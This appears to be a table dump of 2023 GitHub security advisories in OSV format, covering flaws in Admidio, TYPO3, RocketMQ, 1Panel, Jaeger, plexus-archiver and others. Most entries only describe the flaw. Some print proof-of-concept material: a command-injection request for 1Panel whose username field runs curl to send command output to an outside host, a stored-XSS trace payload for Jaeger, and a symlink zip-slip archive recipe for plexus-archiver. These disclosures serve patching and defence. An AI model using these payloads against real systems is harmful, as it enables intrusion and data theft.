schema_version
stringclasses 1
value | id
stringlengths 19
19
| modified
stringlengths 20
20
| published
stringlengths 20
20
| withdrawn
stringlengths 20
20
⌀ | aliases
stringlengths 2
20
| summary
stringlengths 20
140
| details
stringlengths 56
37.2k
| severity
stringlengths 2
92
| affected
stringlengths 88
7.07k
| references
stringlengths 139
4.72k
| database_specific
stringlengths 131
185
|
|---|---|---|---|---|---|---|---|---|---|---|---|
1.4.0
|
GHSA-q347-jrx8-5pw9
|
2023-07-17T10:50:54Z
|
2023-07-16T03:30:52Z
| null |
['CVE-2023-3692']
|
Admidio vulnerable to Unrestricted Upload of File with Dangerous Type
|
Unrestricted Upload of File with Dangerous Type in GitHub repository admidio/admidio prior to 4.2.10.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'admidio/admidio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.10'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3692'}, {'type': 'WEB', 'url': 'https://github.com/admidio/admidio/commit/d66585d14b1160712a8a9bfaf9769dd3da0e9a83'}, {'type': 'PACKAGE', 'url': 'https://github.com/admidio/admidio'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/be6616eb-384d-40d6-b1fd-0ec9e4973f12'}]
|
{'cwe_ids': ['CWE-434'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-17T10:50:54Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-59jf-3q9v-rh6g
|
2023-07-25T18:27:16Z
|
2023-07-25T18:27:16Z
| null |
['CVE-2023-38500']
|
By-passing Cross-Site Scripting Protection in HTML Sanitizer
|
> ### CVSS: `CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N/E:F/RL:O/RC:C` (4.4)
### Problem
Due to an encoding issue in the serialization layer, malicious markup nested in a `noscript` element was not encoded correctly. `noscript` is disabled in the default configuration, but might have been enabled in custom scenarios. This allows bypassing the cross-site scripting mechanism of [`typo3/html-sanitizer`](https://packagist.org/packages/typo3/html-sanitizer).
### Solution
Update to `typo3/html-sanitizer` versions 1.5.1 or 2.1.2 that fix the problem described.
### Credits
Thanks to David Klein and Yaniv Nizry who reported this issue, and to TYPO3 security team members Oliver Hader and Benjamin Franzke who fixed the issue.
### References
* [TYPO3-CORE-SA-2023-002](https://typo3.org/security/advisory/typo3-core-sa-2023-002)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/html-sanitizer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.5.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/html-sanitizer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.1.2'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/TYPO3/html-sanitizer/security/advisories/GHSA-59jf-3q9v-rh6g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38500'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/html-sanitizer/commit/e3026f589fef0be8c3574ee3f0a0bfbe33d7ebdb'}, {'type': 'PACKAGE', 'url': 'https://github.com/TYPO3/html-sanitizer'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2023-002'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-25T18:27:16Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-6hvv-j432-23cv
|
2023-07-14T21:52:09Z
|
2023-07-14T21:52:09Z
| null |
['CVE-2023-34236']
|
Weave GitOps Terraform Controller Information Disclosure Vulnerability
|
### Impact
A vulnerability has been identified in Weave GitOps Terraform Controller which could allow an authenticated remote attacker to view sensitive information. This vulnerability stems from Weave GitOps Terraform Runners (`tf-runner`), where sensitive data is inadvertently printed - potentially revealing sensitive user data in their pod logs. In particular, functions `tfexec.ShowPlan`, `tfexec.ShowPlanRaw`, and `tfexec.Output` are implicated when the `tfexec` object set its `Stdout` and `Stderr` to be `os.Stdout` and `os.Stderr`.
An unauthorized remote attacker could exploit this vulnerability by accessing these prints of sensitive information, which may contain configurations or tokens that could be used to gain unauthorized control or access to resources managed by the Terraform controller.
A successful exploit could allow the attacker to utilize this sensitive data, potentially leading to unauthorized access or control of the system.
### Patches
This vulnerability has been addressed in Weave GitOps Terraform Controller versions `v0.14.4` and `v0.15.0-rc.5`. Users are urged to upgrade to one of these versions to mitigate the vulnerability.
The patches for this vulnerability are found in:
- this commit: 9708fda28ccd0466cb0a8fd409854ab4d92f7dca
- this commit: 6323b355bd7f5d2ce85d0244fe0883af3881df4e
- this commit: 28282bc644054e157c3b9a3d38f1f9551ce09074
- and this commit: 98a0688036e9dbcf43fa84960d9a1ef3e09a69cf
### Workarounds
As a temporary measure until the patch can be applied, users can add the environment variable `DISABLE_TF_LOGS` to the tf-runners via the runner pod template of the Terraform Custom Resource. This will prevent the logging of sensitive information and mitigate the risk of this vulnerability.
### References
- The first issue: https://github.com/weaveworks/tf-controller/issues/637
- The second issue: https://github.com/weaveworks/tf-controller/issues/649
### For More Information
If you have any further questions or comments about this advisory:
Open an issue in the Weave GitOps Terraform Controller repository
Email us at [security@weave.works](mailto:security@weave.works)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/weaveworks/tf-controller'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.14.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/weaveworks/tf-controller'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.15.0-rc.1'}, {'fixed': '0.15.0-rc.5'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/weaveworks/tf-controller/security/advisories/GHSA-6hvv-j432-23cv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34236'}, {'type': 'WEB', 'url': 'https://github.com/weaveworks/tf-controller/issues/637'}, {'type': 'WEB', 'url': 'https://github.com/weaveworks/tf-controller/issues/649'}, {'type': 'WEB', 'url': 'https://github.com/weaveworks/tf-controller/commit/28282bc644054e157c3b9a3d38f1f9551ce09074'}, {'type': 'WEB', 'url': 'https://github.com/weaveworks/tf-controller/commit/6323b355bd7f5d2ce85d0244fe0883af3881df4e'}, {'type': 'WEB', 'url': 'https://github.com/weaveworks/tf-controller/commit/9708fda28ccd0466cb0a8fd409854ab4d92f7dca'}, {'type': 'WEB', 'url': 'https://github.com/weaveworks/tf-controller/commit/98a0688036e9dbcf43fa84960d9a1ef3e09a69cf'}, {'type': 'PACKAGE', 'url': 'https://github.com/weaveworks/tf-controller'}]
|
{'cwe_ids': ['CWE-200', 'CWE-312', 'CWE-522', 'CWE-532'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-14T21:52:09Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-gpq8-963w-8qc9
|
2023-07-20T14:54:54Z
|
2023-07-12T12:31:36Z
| null |
['CVE-2023-37582']
|
RocketMQ NameServer component Code Injection vulnerability
|
The RocketMQ NameServer component still has a remote command execution vulnerability as the CVE-2023-33246 issue was not completely fixed in version 5.1.1.
When NameServer address are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function on the NameServer component to execute commands as the system users that RocketMQ is running as.
It is recommended for users to upgrade their NameServer version to 5.1.2 or above for RocketMQ 5.x or 4.9.7 or above for RocketMQ 4.x to prevent these attacks.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.rocketmq:rocketmq-namesrv'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.9.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.rocketmq:rocketmq-namesrv'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.1.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37582'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/rocketmq'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/m614czxtpvlztd7mfgcs2xcsg36rdbnc'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/12/1'}]
|
{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T17:30:39Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-q6cq-8r4j-6rj5
|
2023-07-12T22:30:48Z
|
2023-07-12T18:30:39Z
| null |
['CVE-2023-37960']
|
Jenkins MathWorks Polyspace Plugin vulnerable to arbitrary file read
|
Jenkins MathWorks Polyspace Plugin 1.0.5 and earlier does not restrict the path of the attached files in Polyspace Notification post-build step.
This allows attackers with Item/Configure permission to send emails with arbitrary files from the Jenkins controller file system.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.mathworks.polyspace.jenkins:mathworks-polyspace'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.5'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37960'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-07-12/#SECURITY-3124'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/12/2'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T22:30:48Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-v93h-rwj8-78qh
|
2023-07-06T23:10:54Z
|
2023-07-06T21:14:56Z
| null |
['CVE-2023-28936']
|
Apache OpenMeetings insufficient authorization vulnerability
|
Attacker can access arbitrary recording/room
Vendor: The Apache Software Foundation
Versions Affected: Apache OpenMeetings from 2.0.0 before 7.1.0
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.openmeetings:openmeetings-db'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '7.1.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28936'}, {'type': 'WEB', 'url': 'https://github.com/apache/openmeetings/commit/a28dea888fca1c5c3e0ce4c8a4c62f501aebe0cd'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/openmeetings'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/OPENMEETINGS-2762'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/y6vng44c22ll221rtvsv208x1pbjmdoc'}]
|
{'cwe_ids': ['CWE-697'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T23:10:54Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-p7w2-784m-qpq9
|
2023-07-20T14:55:52Z
|
2023-07-12T12:31:35Z
| null |
['CVE-2022-45855']
|
Apache Ambari Expression Language Injection vulnerability
|
SpringEL injection in the metrics source in Apache Ambari version 2.7.0 to 2.7.6 allows a malicious authenticated user to execute arbitrary code remotely. Users are recommended to upgrade to 2.7.7.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ambari:ambari'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.7'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-45855'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/ambari'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/302c4hwfjy9lx63jrbhcdx948pxc54l1'}]
|
{'cwe_ids': ['CWE-917'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T17:29:53Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-74mc-g2xv-pch2
|
2023-07-20T19:16:24Z
|
2023-07-12T12:31:36Z
| null |
['CVE-2023-37579']
|
Apache Pulsar Function Worker Incorrect Authorization vulnerability
|
Incorrect Authorization vulnerability in Apache Software Foundation Apache Pulsar Function Worker.
This issue affects Apache Pulsar: before 2.10.4, and 2.11.0.
Any authenticated user can retrieve a source's configuration or a sink's configuration without authorization. Many sources and sinks contain credentials in the configuration, which could lead to leaked credentials. This vulnerability is mitigated by the fact that there is not a known way for an authenticated user to enumerate another tenant's sources or sinks, meaning the source or sink name would need to be guessed in order to exploit this vulnerability.
The recommended mitigation for impacted users is to upgrade the Pulsar Function Worker to a patched version.
2.10 Pulsar Function Worker users should upgrade to at least 2.10.4.
2.11 Pulsar Function Worker users should upgrade to at least 2.11.1.
3.0 Pulsar Function Worker users are unaffected.
Any users running the Pulsar Function Worker for 2.9.* and earlier should upgrade to one of the above patched versions.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.pulsar:pulsar-functions-worker'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.10.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.pulsar:pulsar-functions-worker'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.11.0'}, {'fixed': '2.11.1'}]}], 'versions': ['2.11.0']}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37579'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/pulsar'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/0dmn3cb5n2p08o3cpj3ycfhzfqs2ppwz'}]
|
{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T17:30:28Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-m88m-crr9-jvqq
|
2023-07-18T18:47:27Z
|
2023-07-18T18:47:27Z
| null |
['CVE-2023-37476']
|
OpenRefine vulnerable to zip slip in project import
|
### Impact
A carefully crafted malicious OpenRefine project tar file can be used to trigger arbitrary code execution if a user can be convinced to import it.
### Patches
The vulnerability exists in all versions of OpenRefine up to and including 3.7.3. Users should update to OpenRefine 3.7.4 as soon as possible.
### Workarounds
Only import OpenRefine projects from trusted sources.
### References
A similar [issue](https://github.com/OpenRefine/OpenRefine/issues/1840) existed in the Create Project feature ([CVE-2018-19859](https://nvd.nist.gov/vuln/detail/CVE-2018-19859)), which was fixed by PR [#1901](https://github.com/OpenRefine/OpenRefine/pull/1901).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.openrefine:main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.7.4'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/OpenRefine/OpenRefine/security/advisories/GHSA-m88m-crr9-jvqq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37476'}, {'type': 'WEB', 'url': 'https://github.com/OpenRefine/OpenRefine/commit/e9c1e65d58b47aec8cd676bd5c07d97b002f205e'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenRefine/OpenRefine'}, {'type': 'WEB', 'url': 'https://github.com/OpenRefine/OpenRefine/releases/tag/3.7.4'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-18T18:47:27Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-q2mx-gpjf-3h8x
|
2023-07-05T21:38:07Z
|
2023-07-05T21:38:07Z
| null |
['CVE-2023-36457']
|
1Panel vulnerable to command injection when adding container repositories
|
### Impact
The authenticated attacker can craft a malicious payload to achieve command injection when adding container repositories.
1. Vulnerability analysis.
```
backend\app\api\v1\image_repo.go#create
```

```
backend\app\service\image_repo.go#CheckConn
```

2. vulnerability reproduction.
```
POST /api/v1/containers/repo HTTP/1.1
Host: 192.168.109.152:40982
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-CSRF-TOKEN:
Content-Length: 446
Origin: http://192.168.109.152:40982
Connection: close
Referer: http://192.168.109.152:40982/containers/repo
Cookie: rem-username=admin; psession=a6bcab14-d426-4cfe-8635-533e88b6f75e
```
```
{"id":2,"createdAt":"2023-04-13T19:57:43.633643247-07:00","name":"asdasd","downloadUrl":"127.0.0.1:8080","protocol":"http","username":"admin||curl http://192.168.109.1:12345/`ls`||","auth":true,"status":"Failed","message":"stderr: WARNING! Using --password via the CLI is insecure. Use --password-stdin.\nError response from daemon: Get \"http://127.0.0.1:8080/v2/\": dial tcp 127.0.0.1:8080: connect: connection refused\n","password":"Passw0rd"}
```
3. Using update can be triggered multiple times.
```
POST /api/v1/containers/repo/update HTTP/1.1
Host: 192.168.109.152:40982
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-CSRF-TOKEN:
Content-Length: 447
Origin: http://192.168.109.152:40982
Connection: close
Referer: http://192.168.109.152:40982/containers/repo
Cookie: rem-username=admin; psession=a6bcab14-d426-4cfe-8635-533e88b6f75e
```
```
{"id":2,"createdAt":"2023-04-13T19:57:43.633643247-07:00","name":"asdasd","downloadUrl":"127.0.0.1:8080","protocol":"http","username":"admin||curl http://192.168.109.1:12345/`pwd`||","auth":true,"status":"Failed","message":"stderr: WARNING! Using --password via the CLI is insecure. Use --password-stdin.\nError response from daemon: Get \"http://127.0.0.1:8080/v2/\": dial tcp 127.0.0.1:8080: connect: connection refused\n","password":"Passw0rd"}
```
Affected versions: <= 1.3.5
### Patches
The vulnerability has been fixed in v1.3.6.
### Workarounds
It is recommended to upgrade the version to v1.3.6.
### References
If you have any questions or comments about this advisory:
Open an issue in https://github.com/1Panel-dev/1Panel
Email us at wanghe@fit2cloud.com
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/1Panel-dev/1Panel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.6'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-q2mx-gpjf-3h8x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36457'}, {'type': 'PACKAGE', 'url': 'https://github.com/1Panel-dev/1Panel'}, {'type': 'WEB', 'url': 'https://github.com/1Panel-dev/1Panel/releases/tag/v1.3.6'}]
|
{'cwe_ids': ['CWE-74', 'CWE-77'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-05T21:38:07Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-2w8w-qhg4-f78j
|
2023-07-11T22:45:37Z
|
2023-07-11T22:45:37Z
| null |
[]
|
A stored XSS in jaeger UI might allow an attacker who controls a trace to perform arbitrary jaeger queries
|
Related UI vulnerability advisory: https://github.com/jaegertracing/jaeger-ui/security/advisories/GHSA-vv24-rm95-q56r
### Summary
Jaeger UI is using the `json-markup` dependency to display span attributes and resources. This dependency is not sanitising keys of an object though, thus the `KeyValuesTable` is vulnerable to XSS.
### Details
The vulnerable line is here: https://github.com/jaegertracing/jaeger-ui/blob/main/packages/jaeger-ui/src/components/TracePage/TraceTimelineViewer/SpanDetail/KeyValuesTable.tsx#L49
### PoC
1. Start a Jaeger UI
2. Save the following trace as a file:
```json
{
"data": [
{
"traceID": "076ef819cc06c45a",
"spans": [
{
"traceID": "076ef819cc06c45a",
"spanID": "076ef819cc06c45a",
"flags": 1,
"operationName": "and open 'attributes'",
"references": [],
"startTime": 1678196149232010,
"duration": 13485,
"tags": [
{
"key": "sampler.type",
"type": "string",
"value": "{\"<img src=x onerror=alert(1)>\":\"test\"}"
}
],
"logs": [],
"processID": "p1",
"warnings": null
}
],
"processes": {
"p1": {
"serviceName": "click here",
"tags": [
]
}
},
"warnings": null
}
],
"total": 0,
"limit": 0,
"offset": 0,
"errors": null
}
```
3. Upload that trace to Jaeger UI in order to visualise it.
4. Open the trace, open it's span's attributes.
5. XSS should be fired.
### Impact
This is a XSS on Jaeger UI. XSS can be used to run JavaScript.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/jaegertracing/jaeger'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.47.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/jaegertracing/jaeger-ui/security/advisories/GHSA-vv24-rm95-q56r'}, {'type': 'WEB', 'url': 'https://github.com/jaegertracing/jaeger/security/advisories/GHSA-2w8w-qhg4-f78j'}, {'type': 'PACKAGE', 'url': 'https://github.com/jaegertracing/jaeger'}, {'type': 'WEB', 'url': 'https://github.com/jaegertracing/jaeger-ui/blob/main/packages/jaeger-ui/src/components/TracePage/TraceTimelineViewer/SpanDetail/KeyValuesTable.tsx#L49'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-11T22:45:37Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-9q9v-qgwx-84mr
|
2023-07-31T19:02:11Z
|
2023-07-26T12:30:28Z
| null |
['CVE-2023-38673']
|
Command injection in PaddlePaddle
|
PaddlePaddle before 2.5.0 has a command injection in fs.py. This resulted in the ability to execute arbitrary commands on the operating system.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'paddlepaddle'}, 'ecosystem_specific': {'affected_functions': ['paddle.distributed.fleet.utils.LocalFS']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38673'}, {'type': 'WEB', 'url': 'https://github.com/PaddlePaddle/Paddle/commit/2bfe358043096fdba9e2a4cf0f5740102b37fd8f'}, {'type': 'PACKAGE', 'url': 'https://github.com/PaddlePaddle/Paddle'}, {'type': 'WEB', 'url': 'https://github.com/PaddlePaddle/Paddle/blob/develop/security/advisory/pdsa-2023-005.md'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/paddlepaddle/PYSEC-2023-126.yaml'}]
|
{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-26T22:33:35Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-wh3p-fphp-9h2m
|
2023-08-03T17:59:29Z
|
2023-07-25T17:20:43Z
| null |
['CVE-2023-37460']
|
Arbitrary File Creation in AbstractUnArchiver
|
### Summary
Using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution.
### Description
When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the resolveFile() function will return the symlink's source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later Files.newOutputStream(), that follows symlinks by default, will actually write the entry's content to the symlink's target.
### Impact
Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution.
### Technical Details
In [AbstractUnArchiver.java](https://github.com/codehaus-plexus/plexus-archiver/blob/plexus-archiver-4.7.1/src/main/java/org/codehaus/plexus/archiver/AbstractUnArchiver.java#L342):
```java
protected void extractFile( final File srcF, final File dir, final InputStream compressedInputStream, String entryName, final Date entryDate, final boolean isDirectory, final Integer mode, String symlinkDestination, final FileMapper[] fileMappers)
throws IOException, ArchiverException
{
...
// Hmm. Symlinks re-evaluate back to the original file here. Unsure if this is a good thing...
final File targetFileName = FileUtils.resolveFile( dir, entryName );
// Make sure that the resolved path of the extracted file doesn't escape the destination directory
// getCanonicalFile().toPath() is used instead of getCanonicalPath() (returns String),
// because "/opt/directory".startsWith("/opt/dir") would return false negative.
Path canonicalDirPath = dir.getCanonicalFile().toPath();
Path canonicalDestPath = targetFileName.getCanonicalFile().toPath();
if ( !canonicalDestPath.startsWith( canonicalDirPath ) )
{
throw new ArchiverException( "Entry is outside of the target directory (" + entryName + ")" );
}
try
{
...
if ( !StringUtils.isEmpty( symlinkDestination ) )
{
SymlinkUtils.createSymbolicLink( targetFileName, new File( symlinkDestination ) );
}
else if ( isDirectory )
{
targetFileName.mkdirs();
}
else
{
try ( OutputStream out = Files.newOutputStream( targetFileName.toPath() ) )
{
IOUtil.copy( compressedInputStream, out );
}
}
targetFileName.setLastModified( entryDate.getTime() );
if ( !isIgnorePermissions() && mode != null && !isDirectory )
{
ArchiveEntryUtils.chmod( targetFileName, mode );
}
}
catch ( final FileNotFoundException ex )
{
getLogger().warn( "Unable to expand to file " + targetFileName.getPath() );
}
}
```
When given an entry that already exists in dir as a symbolic link whose target does not exist - the symbolic link’s target will be created and the content of the archive’s entry will be written to it.
That’s because the way FileUtils.resolveFile() works:
```java
public static File resolveFile( final File baseFile, String filename )
{
...
try
{
file = file.getCanonicalFile();
}
catch ( final IOException ioe )
{
// nop
}
return file;
}
```
File.getCanonicalFile() (tested with the most recent version of openjdk (22.2) on Unix) will eventually call [JDK_Canonicalize()](https://github.com/openjdk/jdk/blob/jdk-22%2B2/src/java.base/unix/native/libjava/canonicalize_md.c#LL48C1-L68C69):
```cpp
JNIEXPORT int
JDK_Canonicalize(const char *orig, char *out, int len)
{
if (len < PATH_MAX) {
errno = EINVAL;
return -1;
}
if (strlen(orig) > PATH_MAX) {
errno = ENAMETOOLONG;
return -1;
}
/* First try realpath() on the entire path */
if (realpath(orig, out)) {
/* That worked, so return it */
collapse(out);
return 0;
} else {
/* Something's bogus in the original path, so remove names from the end
until either some subpath works or we run out of names */
...
```
realpath() returns the destination path for a symlink, if this destination exists. But if it doesn’t -
it will return NULL and we will reach the else’s clause, which will eventually return the path of the symlink itself.
So in case the entry is already exists as a symbolic link to a non-existing file - file.getCanonicalFile() will return the absolute path of the symbolic link and this check will pass:
```java
Path canonicalDirPath = dir.getCanonicalFile().toPath();
Path canonicalDestPath = targetFileName.getCanonicalFile().toPath();
if ( !canonicalDestPath.startsWith( canonicalDirPath ) )
{
throw new ArchiverException( "Entry is outside of the target directory (" + entryName + ")" );
}
```
Later, the content of the entry will be written to the symbolic link’s destination and by doing so will create the destination file and fill it with the entry’s content.
Arbitrary file creation can lead to remote code execution. For example, if there is an SSH server on the victim’s machine and ~/.ssh/authorized_keys does not exist - creating this file and filling it with an attacker's public key will allow the attacker to connect the SSH server without knowing the victim’s password.
### PoC
We created a zip as following:
```bash
$ ln -s /tmp/target entry1
$ echo -ne “content” > entry2
$ zip --symlinks archive.zip entry1 entry2
```
The following command will change the name of entry2 to entry1:
```bash
$ sed -i 's/entry2/entry1/' archive.zip
```
We put archive.zip in /tmp and create a dir for the extracted files:
```bash
$ cp archive.zip /tmp
$ mkdir /tmp/extracted_files
```
Next, we wrote a java code that opens archive.zip:
```java
package com.example;
import java.io.File;
import org.codehaus.plexus.archiver.zip.ZipUnArchiver;
public class App
{
public static void main( String[] args )
{
ZipUnArchiver unArchiver = new ZipUnArchiver(new File("/tmp/archive.zip"));
unArchiver.setDestDirectory(new File("/tmp/extracted_files"));
unArchiver.extract();
}
}
```
After running this java code, we can see that /tmp/target contains the string “content”:
```
$ cat /tmp/target
content
```
Notice that although we used here a duplicated entry name in the same archive, this attack can be performed also by two different archives - one that contains a symlink and another archive that contains a regular file with the same entry name as the symlink.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.codehaus.plexus:plexus-archiver'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.8.0'}]}]}]
|
